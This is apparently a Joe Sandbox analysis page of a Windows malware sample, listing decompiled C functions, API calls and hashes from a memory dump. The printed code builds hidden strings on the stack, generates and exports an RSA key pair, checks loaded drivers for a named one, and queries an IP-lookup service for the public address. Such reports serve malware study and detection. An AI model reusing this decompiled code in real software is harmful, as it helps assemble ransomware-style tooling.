Instruction ID: 8eae057ceb9583714cbc160f3fc64376c6f5306405733d89d3dd96d525bd0570
Opcode Fuzzy Hash: 3cd66f2fd896895adf448fe0f22355beab2b0fef869e8eadf19fb7dcae79777a
Instruction Fuzzy Hash: EA517F71900218ABDB20CF58DC48BAEBFB5FF84725F10415AEE14AB382C7745949CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E82B0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111
encryptionlibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E0F4E82B0(intOrPtr __ecx, void* __edx) {
				long* _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t37;
				void* _t40;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				signed int _t54;
				long _t55;
				intOrPtr _t56;
				signed int _t58;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t65;

				_t54 = 0;
				_v12 = __ecx;
				_t37 =  &_v8;
				_t63 = __edx;
				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000); // executed
				if(_t37 == 0) {
					L15:
					return _t54;
				} else {
					_t58 = 0;
					do {
						_t3 = _t58 + 0x61; // 0x61
						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
						_t58 = _t58 + 1;
					} while (_t58 < 0x1a);
					_t7 = _t63 + 1; // 0x1
					_t55 = _t7;
					_t40 = VirtualAlloc(0, _t55, 0x3000, 0x40); // executed
					_t64 = _t40;
					if(_t64 == 0 || _t63 >= _t55) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t45 = GetModuleHandleA( &_v32);
						if(_t45 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t46 = GetProcAddress(_t45, _t19);
							if(_t46 == 0) {
								goto L13;
							} else {
								_push(_t64);
								_push(_t63);
								_push(_v8);
								if( *_t46() == 0) {
									goto L13;
								} else {
									_t60 = 0;
									if(_t63 != 0) {
										_t56 = _v12;
										_v16 = 0x1a;
										do {
											asm("cdq");
											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
											_t60 = _t60 + 1;
										} while (_t60 < _t63);
									}
									_t54 = 1;
								}
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t45 = LoadLibraryA(_t18);
							if(_t45 == 0) {
								L13:
								_t54 = 0;
							} else {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000); // executed
						goto L15;
					}
				}
			}

0x0f4e82c0
0x0f4e82c2
0x0f4e82c7
0x0f4e82ca
0x0f4e82cd
0x0f4e82d5
0x0f4e83c9
0x0f4e83d1
0x0f4e82db
0x0f4e82db
0x0f4e82e0
0x0f4e82e0
0x0f4e82e3
0x0f4e82e8
0x0f4e82e9
0x0f4e82f5
0x0f4e82f5
0x0f4e82fb
0x0f4e8301
0x0f4e8305
0x0f4e83d7
0x0f4e83e5
0x0f4e83f3
0x0f4e8313
0x0f4e8316
0x0f4e831e
0x0f4e8325
0x0f4e832c
0x0f4e8332
0x0f4e8336
0x0f4e833d
0x0f4e8344
0x0f4e834b
0x0f4e834f
0x0f4e8357
0x0f4e8367
0x0f4e8367
0x0f4e836c
0x0f4e8374
0x00000000
0x0f4e8376
0x0f4e8376
0x0f4e8377
0x0f4e8378
0x0f4e837f
0x00000000
0x0f4e8381
0x0f4e8381
0x0f4e8385
0x0f4e8387
0x0f4e838a
0x0f4e8391
0x0f4e8395
0x0f4e839e
0x0f4e83a2
0x0f4e83a3
0x0f4e8391
0x0f4e83a7
0x0f4e83a7
0x0f4e837f
0x0f4e8359
0x0f4e8359
0x0f4e835d
0x0f4e8365
0x0f4e83ae
0x0f4e83ae
0x00000000
0x00000000
0x00000000
0x0f4e8365
0x0f4e83b5
0x0f4e83c3
0x00000000
0x0f4e83c3
0x0f4e8305

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F4E82CD
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F4E82FB
GetModuleHandleA.KERNEL32(?), ref: 0F4E834F
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F4E835D
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F4E836C
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F4E83B5
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F4E83C3
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F4E83D7
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F4E83E5

Strings

Advapi32.dll, xrefs: 0F4E8359, 0F4E835C
CryptGenRandomAdvapi32.dll, xrefs: 0F4E8367, 0F4E836A

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: 04c09c865bdb19ce3521e02bc4fca388abbf00b95c0cf63d8a39c6d2e88b95a0
Instruction ID: 86fadfbfcdd6162f511cfc20c3c59f413dd8e26d57e522e24f05a6319bf5a0bd
Opcode Fuzzy Hash: 04c09c865bdb19ce3521e02bc4fca388abbf00b95c0cf63d8a39c6d2e88b95a0
Instruction Fuzzy Hash: E231C771A00209ABDF20CFE5DC89BEEBF79FF44712F14406AED01A6281E7759A11CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E8400 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0F4E8400(intOrPtr __ecx, intOrPtr __edx) {
				long* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t25;
				void* _t28;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				long _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				_t46 = 0;
				_v16 = __ecx;
				_t25 =  &_v8;
				_v12 = __edx;
				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000); // executed
				if(_t25 == 0) {
					L10:
					return _t46;
				} else {
					_t42 = 0;
					do {
						_t4 = _t42 + 0x61; // 0x61
						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
						_t42 = _t42 + 1;
					} while (_t42 < 0x1a);
					_t40 = __edx + 1;
					_t28 = VirtualAlloc(0, _t40, 0x3000, 0x40); // executed
					_t47 = _t28;
					if(_t47 == 0 || _v12 >= _t40) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t33 = GetModuleHandleA( &_v32);
						if(_t33 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t34 = GetProcAddress(_t33, _t19);
							if(_t34 != 0) {
								 *_t34(_v8, _v12, _v16);
								_t46 =  !=  ? 1 : _t46;
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t33 = LoadLibraryA(_t18);
							if(_t33 != 0) {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000); // executed
						goto L10;
					}
				}
			}

0x0f4e8410
0x0f4e8412
0x0f4e8417
0x0f4e841d
0x0f4e8420
0x0f4e8428
0x0f4e84f2
0x0f4e84fa
0x0f4e842e
0x0f4e842e
0x0f4e8430
0x0f4e8430
0x0f4e8433
0x0f4e8437
0x0f4e8438
0x0f4e8444
0x0f4e8448
0x0f4e844e
0x0f4e8452
0x0f4e8500
0x0f4e850e
0x0f4e851c
0x0f4e8461
0x0f4e8464
0x0f4e846c
0x0f4e8473
0x0f4e847a
0x0f4e8480
0x0f4e8484
0x0f4e848b
0x0f4e8492
0x0f4e8499
0x0f4e849d
0x0f4e84a5
0x0f4e84b5
0x0f4e84b5
0x0f4e84ba
0x0f4e84c2
0x0f4e84cd
0x0f4e84d6
0x0f4e84d6
0x0f4e84a7
0x0f4e84a7
0x0f4e84ab
0x0f4e84b3
0x00000000
0x00000000
0x0f4e84b3
0x0f4e84de
0x0f4e84ec
0x00000000
0x0f4e84ec
0x0f4e8452

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,747166A0,00000000), ref: 0F4E8420
VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 0F4E8448
GetModuleHandleA.KERNEL32(?), ref: 0F4E849D
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F4E84AB
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F4E84BA
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F4E84DE
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F4E84EC
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F4E3875), ref: 0F4E8500
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F4E3875), ref: 0F4E850E

Strings

Advapi32.dll, xrefs: 0F4E84A7, 0F4E84AA
CryptGenRandomAdvapi32.dll, xrefs: 0F4E84B5, 0F4E84B8

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: bac965ae137d21b8c0e8b373e3db82bb1f714162c290bcd0318feea40ffb2ee0
Instruction ID: 8e93eb1bb2fc51e7d8e63bb5cd180631ca11f1407c936b2824adac0389a9d226
Opcode Fuzzy Hash: bac965ae137d21b8c0e8b373e3db82bb1f714162c290bcd0318feea40ffb2ee0
Instruction Fuzzy Hash: 40319371A00209AFDF10CFA5DC49BEEBFB9EF44712F104169EE05E6281E7789A148B65

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E63E0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0F4E63E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long* _v8;
				long* _v12;
				int _v16;
				long** _t15;
				long* _t16;
				long _t23;

				_t15 =  &_v8;
				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000); // executed
				if(_t15 != 0) {
					L6:
					_t16 = _v8;
					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12); // executed
					if(_t16 == 0) {
					}
					_v16 = 0;
					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16); // executed
					CryptDestroyKey(_v12);
					CryptReleaseContext(_v8, 0);
					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10); // executed
					return 1;
				}
				_t23 = GetLastError();
				if(_t23 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t23 != 0) {
					goto L6;
				}
				return 0;
			}

0x0f4e63f4
0x0f4e63f8
0x0f4e6400
0x0f4e6438
0x0f4e6446
0x0f4e644a
0x0f4e6452
0x0f4e6452
0x0f4e6455
0x0f4e646e
0x0f4e6486
0x0f4e6490
0x0f4e649c
0x0f4e64b1
0x00000000
0x0f4e64b7
0x0f4e6402
0x0f4e640d
0x00000000
0x0f4e6431
0x0f4e641e
0x0f4e6426
0x00000000
0x0f4e642f
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(0F4E4B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0F4E4B96,?,0F4E4B9E), ref: 0F4E63F8
GetLastError.KERNEL32(?,0F4E4B9E), ref: 0F4E6402
CryptAcquireContextW.ADVAPI32(0F4E4B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F4E4B9E), ref: 0F4E641E
CryptGenKey.ADVAPI32(0F4E4B9E,0000A400,08000001,?,?,0F4E4B9E), ref: 0F4E644A
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0F4E646E
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0F4E6486
CryptDestroyKey.ADVAPI32(?), ref: 0F4E6490
CryptReleaseContext.ADVAPI32(0F4E4B9E,00000000), ref: 0F4E649C
CryptAcquireContextW.ADVAPI32(0F4E4B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0F4E64B1

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0F4E63ED, 0F4E6413, 0F4E64A6

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 137402220-1948191093
Opcode ID: 99d6f44fbbce3a4d442b52596ea1452e7b27efc1ca7f1132a5a7265ae12cd9be
Instruction ID: 5421de94b7a987cd2d3adabf7b09fd2d2bda0c5c13f5adcaf2b1f5852e912bbe
Opcode Fuzzy Hash: 99d6f44fbbce3a4d442b52596ea1452e7b27efc1ca7f1132a5a7265ae12cd9be
Instruction Fuzzy Hash: 96217175790305BBEB20CFA0DD4AFEA3B79AB58B12F104504FF01AE1C2C6B9A5549B64

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E2F50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86
memoryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0F4E2F50(WCHAR* __ecx) {
				unsigned int _v8;
				char _v12;
				WCHAR* _v16;
				short _v2064;
				long _t17;
				void* _t18;
				void* _t20;
				WCHAR* _t23;
				int _t25;
				void* _t28;
				unsigned int _t31;
				void* _t35;
				intOrPtr* _t39;
				signed int _t40;

				_t39 = __imp__EnumDeviceDrivers;
				_v16 = __ecx;
				_v8 = 0;
				 *_t39( &_v12, 4,  &_v8); // executed
				_t17 = _v8;
				if(_t17 != 0) {
					_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
					_t35 = _t18;
					if(_t35 != 0) {
						_t20 =  *_t39(_t35, _v8,  &_v12, _t28); // executed
						if(_t20 == 0) {
							L10:
							VirtualFree(_t35, 0, 0x8000); // executed
							return 0;
						} else {
							_t40 = 0;
							_t31 = _v8 >> 2;
							if(_t31 > 0) {
								do {
									_t23 =  &_v2064;
									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400); // executed
									if(_t23 == 0) {
										goto L9;
									} else {
										_t25 = lstrcmpiW( &_v2064, _v16); // executed
										if(_t25 == 0) {
											VirtualFree(_t35, 0, 0x8000);
											return 1;
										} else {
											goto L9;
										}
									}
									goto L12;
									L9:
									_t40 = _t40 + 1;
								} while (_t40 < _t31);
							}
							goto L10;
						}
					} else {
						return _t18;
					}
				} else {
					return _t17;
				}
				L12:
			}

0x0f4e2f5a
0x0f4e2f69
0x0f4e2f6d
0x0f4e2f74
0x0f4e2f76
0x0f4e2f7b
0x0f4e2f8d
0x0f4e2f93
0x0f4e2f97
0x0f4e2fa8
0x0f4e2fac
0x0f4e2ff2
0x0f4e2ffa
0x0f4e3008
0x0f4e2fae
0x0f4e2fb1
0x0f4e2fb3
0x0f4e2fb8
0x0f4e2fc0
0x0f4e2fc5
0x0f4e2fcf
0x0f4e2fd7
0x00000000
0x0f4e2fd9
0x0f4e2fe3
0x0f4e2feb
0x0f4e3011
0x0f4e3022
0x00000000
0x00000000
0x00000000
0x0f4e2feb
0x00000000
0x0f4e2fed
0x0f4e2fed
0x0f4e2fee
0x0f4e2fc0
0x00000000
0x0f4e2fb8
0x0f4e2f99
0x0f4e2f9e
0x0f4e2f9e
0x0f4e2f81
0x0f4e2f81
0x0f4e2f81
0x00000000

APIs

K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0F4E2F74
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F4E2F8D

Strings

iqt, xrefs: 0F4E2FE3

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: AllocDeviceDriversEnumVirtual
String ID: iqt
API String ID: 4140748134-2805759263
Opcode ID: 2211bc0924d13ef13bd2165db287ebdfe4ab316516a8c8df4ab73be11497c02d
Instruction ID: f937d5d18441876d2d3d697765d44e107498e9ba8c471161f2da0c8d7e9adf52
Opcode Fuzzy Hash: 2211bc0924d13ef13bd2165db287ebdfe4ab316516a8c8df4ab73be11497c02d
Instruction Fuzzy Hash: 7721AD31A00119ABEB10DE989C85FEABBBCEB44716F104197FD04D6141E7B5AA159B90

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E6FF0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringmemorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 0F4E7E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F4E8024
Part of subcall function 0F4E7E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F4E803D

VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,747166A0,?), ref: 0F4E700F
lstrlenW.KERNEL32(0F4EFF8C), ref: 0F4E701C

Part of subcall function 0F4E8050: InternetCloseHandle.WININET(?), ref: 0F4E8063
Part of subcall function 0F4E8050: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F4E8082

lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0F4EFF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F4E704B
wsprintfW.USER32 ref: 0F4E7063
VirtualFree.KERNELBASE(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0F4EFF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F4E7079
InternetCloseHandle.WININET(?), ref: 0F4E7087

Strings

ipv4bot.whatismyipaddress.com, xrefs: 0F4E703C
GET, xrefs: 0F4E7024

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
String ID: GET$ipv4bot.whatismyipaddress.com
API String ID: 4289327240-2259699238
Opcode ID: 8666da65b16d32211f8610dea768b16c2aa13f44d99a3c3157b823e471e6fad9
Instruction ID: 26522cade61671ffeaf810c6ac0bf5a02e557f23ae24ad60228eb8698bbdfce8
Opcode Fuzzy Hash: 8666da65b16d32211f8610dea768b16c2aa13f44d99a3c3157b823e471e6fad9
Instruction Fuzzy Hash: C40175357402007BDB20AB669D4EFDF7E29AF85B33F104026FE05E51C2DA789519C6A5

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E7E40 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 88
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F4E7E40(void* __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				short _v224;
				WCHAR* _t62;
				void* _t64;

				_v8 = 0;
				_v224 = 0x6f004d;
				_v220 = 0x69007a;
				_v216 = 0x6c006c;
				_v212 = 0x2f0061;
				_v208 = 0x2e0035;
				_v204 = 0x200030;
				_v200 = 0x570028;
				_v196 = 0x6e0069;
				_v192 = 0x6f0064;
				_v188 = 0x730077;
				_v184 = 0x4e0020;
				_v180 = 0x200054;
				_v176 = 0x2e0036;
				_v172 = 0x3b0031;
				_v168 = 0x570020;
				_v164 = 0x57004f;
				_v160 = 0x340036;
				_v156 = 0x200029;
				_v152 = 0x700041;
				_v148 = 0x6c0070;
				_v144 = 0x570065;
				_v140 = 0x620065;
				_v136 = 0x69004b;
				_v132 = 0x2f0074;
				_v128 = 0x330035;
				_v124 = 0x2e0037;
				_v120 = 0x360033;
				_v116 = 0x280020;
				_v112 = 0x48004b;
				_v108 = 0x4d0054;
				_v104 = 0x2c004c;
				_v100 = 0x6c0020;
				_v96 = 0x6b0069;
				_v92 = 0x200065;
				_v88 = 0x650047;
				_v84 = 0x6b0063;
				_v80 = 0x29006f;
				_v76 = 0x430020;
				_v72 = 0x720068;
				_v68 = 0x6d006f;
				_v64 = 0x2f0065;
				_v60 = 0x350035;
				_v56 = 0x30002e;
				_v52 = 0x32002e;
				_v48 = 0x380038;
				_v44 = 0x2e0033;
				_v40 = 0x370038;
				_v36 = 0x530020;
				_v32 = 0x660061;
				_v28 = 0x720061;
				_v24 = 0x2f0069;
				_v20 = 0x330035;
				_v16 = 0x2e0037;
				_v12 = 0x360033;
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0); // executed
				 *(__ecx + 4) = _t62;
				if(_t62 == 0) {
					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
					 *(__ecx + 4) = _t64;
					return _t64;
				}
				return _t62;
			}

0x0f4e7e58
0x0f4e7e64
0x0f4e7e6f
0x0f4e7e79
0x0f4e7e83
0x0f4e7e8d
0x0f4e7e97
0x0f4e7ea1
0x0f4e7eab
0x0f4e7eb5
0x0f4e7ebf
0x0f4e7ec9
0x0f4e7ed3
0x0f4e7edd
0x0f4e7ee7
0x0f4e7ef1
0x0f4e7efb
0x0f4e7f05
0x0f4e7f0f
0x0f4e7f19
0x0f4e7f23
0x0f4e7f2d
0x0f4e7f37
0x0f4e7f41
0x0f4e7f4b
0x0f4e7f52
0x0f4e7f59
0x0f4e7f60
0x0f4e7f67
0x0f4e7f6e
0x0f4e7f75
0x0f4e7f7c
0x0f4e7f83
0x0f4e7f8a
0x0f4e7f91
0x0f4e7f98
0x0f4e7f9f
0x0f4e7fa6
0x0f4e7fad
0x0f4e7fb4
0x0f4e7fbb
0x0f4e7fc2
0x0f4e7fc9
0x0f4e7fd0
0x0f4e7fd7
0x0f4e7fde
0x0f4e7fe5
0x0f4e7fec
0x0f4e7ff3
0x0f4e7ffa
0x0f4e8001
0x0f4e8008
0x0f4e800f
0x0f4e8016
0x0f4e801d
0x0f4e8024
0x0f4e8026
0x0f4e802b
0x0f4e803d
0x0f4e803f
0x00000000
0x0f4e803f
0x0f4e8048

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F4E8024
InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F4E803D

Strings

, xrefs: 0F4E7FAD
w, xrefs: 0F4E7EBF
8, xrefs: 0F4E7FEC
., xrefs: 0F4E7FD7
e, xrefs: 0F4E7F37
e, xrefs: 0F4E7FC2
i, xrefs: 0F4E7EAB
L, xrefs: 0F4E7F7C
., xrefs: 0F4E7FD0
3, xrefs: 0F4E801D
K, xrefs: 0F4E7F41
(, xrefs: 0F4E7EA1
K, xrefs: 0F4E7F6E
3, xrefs: 0F4E7FE5
i, xrefs: 0F4E7F8A
0, xrefs: 0F4E7E97
, xrefs: 0F4E7F83
M, xrefs: 0F4E7E64
T, xrefs: 0F4E7F75
7, xrefs: 0F4E8016
1, xrefs: 0F4E7EE7
5, xrefs: 0F4E7F52
, xrefs: 0F4E7EC9
5, xrefs: 0F4E800F
z, xrefs: 0F4E7E6F
6, xrefs: 0F4E7EDD
, xrefs: 0F4E7F67
, xrefs: 0F4E7EF1
6, xrefs: 0F4E7F05
t, xrefs: 0F4E7F4B
a, xrefs: 0F4E7FFA
7, xrefs: 0F4E7F59
e, xrefs: 0F4E7F91
5, xrefs: 0F4E7E8D
5, xrefs: 0F4E7FC9
e, xrefs: 0F4E7F2D
a, xrefs: 0F4E8001
l, xrefs: 0F4E7E79
o, xrefs: 0F4E7FA6
c, xrefs: 0F4E7F9F
o, xrefs: 0F4E7FBB
8, xrefs: 0F4E7FDE
a, xrefs: 0F4E7E83
, xrefs: 0F4E7FF3
p, xrefs: 0F4E7F23
i, xrefs: 0F4E8008
3, xrefs: 0F4E7F60
G, xrefs: 0F4E7F98
d, xrefs: 0F4E7EB5
), xrefs: 0F4E7F0F
O, xrefs: 0F4E7EFB
A, xrefs: 0F4E7F19
T, xrefs: 0F4E7ED3
h, xrefs: 0F4E7FB4

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
